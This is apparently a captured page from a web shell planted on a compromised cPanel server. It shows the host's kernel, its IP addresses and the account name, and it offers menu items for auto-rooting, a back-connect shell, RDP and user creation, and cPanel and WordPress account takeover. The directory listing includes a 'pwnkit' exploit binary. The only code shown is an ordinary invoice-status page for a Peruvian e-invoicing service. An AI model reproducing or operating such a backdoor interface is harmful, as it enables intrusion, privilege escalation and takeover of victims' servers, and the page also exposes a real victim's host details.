Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
consultacpe /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
envios
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
ico
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
registrar
[ DIR ]
drwxr-xr-x
sire
[ DIR ]
drwxr-xr-x
.htaccess
322
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
consultacpe2024.zip
1.77
MB
-rw-r--r--
cs2025.zip
1.77
MB
-rw-r--r--
envios.php
2.98
KB
-rw-r--r--
index.php
3.21
KB
-rw-r--r--
prueba.php
228
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
registrar.php
2.84
KB
-rw-r--r--
resultados.php
2.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : envios.php
<!DOCTYPE html> <html lang="ES-es"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="cache-control" content="no-cache"/> <meta http-equiv="expires" content="0"/> <meta http-equiv="pragma" content="no-cache"/> <title>Envio de Comprobantes | Seven</title> <meta name="description" content="Resultado de consulta de Comprobantes Electronicos - Seven"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <link rel="shortcut icon" href="ico/favicon.ico" type="image/x-icon"> <link rel="stylesheet" href="css/semantic.css"> <link rel="stylesheet" href="css/resultado.css"> </head> <body cz-shortcut-listen="true"> <!-- Start Login Page --> <section id="wrap"> <div class="container"> <span><img src="img/isologo.png" alt="Seven"/></span> <h1>Seven</h1> <hr class="slideRight"> <p>Comprobantes enviados a SUNAT - <b><u>Ultimos 30 días</u></b></p> </div> <div class="ui hidden divider"></div> <div class="pusher"> <div class="ui equal width left aligned padded grid stackable centered"> <div class="sixteen wide tablet sixteen wide computer column "> <div class="ui segment"> <div class="ui green label">ACEPTADOS</div><div class="ui yellow label">RECHAZADOS</div><div class="ui violet label">PENDIENTES</div><div class="ui red label">NO ENVIADOS</div> <a href="http://consultacpe.appseven.pe/envios.php" style="float: right;" class="ui right black label">APPSEVEN.PE</a> <a href="http://consultacpe.appweb.pe/envios.php" style="float: right;" class="ui right black label">APPWEB.PE</a> <a href="http://consultacpe.app-seven.com/envios.php" style="float: right;" class="ui right black label">APP-SEVEN.COM</a> <a href="http://consultacpe.app-siete.com/envios.php" style="float: right;" class="ui right black label">APP-SIETE.COM</a> <div style="float: right;" class="ui right blue label"><u>APPSIETE.COM</u></div> <table class="ui celled striped table"> <thead> <tr> <th class="head_table">Nº</th> <th class="head_table">Nombre de la Empresa</th> <th class="head_table">Facturas</th> <th class="head_table">Notas de Facturas</th> <th class="head_table">Resumen de Boletas</th> <th class="head_table">Resumen de Notas</th> <th class="head_table">Guias de Remision</th> </tr> </thead> <tbody id="tbody"> </tbody> </table> </div> </div> </div> </div> <footer> <div id="copy">© Seven | <?php echo date("Y"); ?></div> </footer> </section> <!-- End Login Page --> <script src="js/sweetalert.min.js"></script> <script src="js/jquery-3.3.1.min.js"></script> <script src="js/semantic.min.js"></script> <script src="js/envios.js"></script> </body> </html>
Close